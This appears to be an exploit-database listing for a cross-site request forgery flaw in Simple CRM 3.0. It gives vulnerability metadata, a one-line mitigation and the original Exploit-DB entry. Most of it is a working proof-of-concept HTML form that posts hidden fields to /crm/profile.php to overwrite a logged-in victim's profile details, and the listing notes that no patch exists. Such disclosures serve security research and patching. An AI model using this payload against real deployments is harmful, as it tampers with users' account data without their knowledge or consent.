header-logo
Suggest Exploit
vendor:
Simple CRM
by:
Riadh Benlamine (rbn0x00)
8,8
CVSS
HIGH
Cross-site request forgery
352
CWE
Product Name: Simple CRM
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: No
Related CWE: N/A
CPE: a:phpgurukul:simple_crm:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache2+MariaDB
2021

Simple CRM 3.0 – ‘Change user information’ Cross-Site Request Forgery (CSRF)

Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url. The vulnerable page is /crm/profile.php. The proof of concept code includes an HTML form with hidden inputs for name, alt_email, phone, gender, address, and update, which when submitted, will update the user information.

Mitigation:

Implementing a CSRF token in the form to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://phpgurukul.com/
# Software Link:   https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url

Vulnerable page: /crm/profile.php

POC:
----
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="alt&#95;email" value="" />
      <input type="hidden" name="phone" value="0123456789" />
      <input type="hidden" name="gender" value="m" />
      <input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
      <input type="hidden" name="update" value="Update" />
      <input type="submit" value="Exploit" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR